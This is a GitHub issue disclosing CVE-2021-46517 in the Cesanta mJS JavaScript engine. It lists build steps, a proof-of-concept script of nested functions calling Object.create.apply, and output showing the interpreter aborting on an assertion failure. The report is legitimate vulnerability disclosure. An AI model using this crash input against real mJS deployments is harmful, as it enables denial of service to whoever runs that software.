CVE-2021-46517: Assertion `mjs_stack_size(&mjs->scopes) > 0' failed src/mjs_exec.c:725: mjs_execute. · Issue #184 · cesanta/mjs

There is an Assertion `mjs_stack_size(&mjs->scopes) > 0' failed at src/mjs_exec.c in Cesanta MJS v2.20.0.


mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile

DOCKER_GCC=gcc
DOCKER_CLANG=clang
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)

Save the Makefile, then make:

make

Test case

poc.js

(function() {
  ((function JSEtest(a) {
    if (a > 3) {
      if ([((function JSEtest(a) {
    if (a > 3) {
      if ([Object.create.apply({}, [Object])]) {
      Object.create.apply({}, [Object])
    }
    }
  })(6))([((function JSEtest(a) {
    if (a > 3) {
      if ([Object.create.apply({}, [Object])]) {
      Object.create.apply({}, [Object])
    }
    }
  })(6))({}, [Object])])]) {
      Object.create.apply({}, [Object])
    }
    }
  })(6))
})()

Execution steps & Output

$ ./mjs/build/mjs poc.js

mjs: src/mjs_exec.c:725: mjs_execute: Assertion `mjs_stack_size(&mjs->scopes) > 0' failed.
[1] 111718 abort mjs poc.js
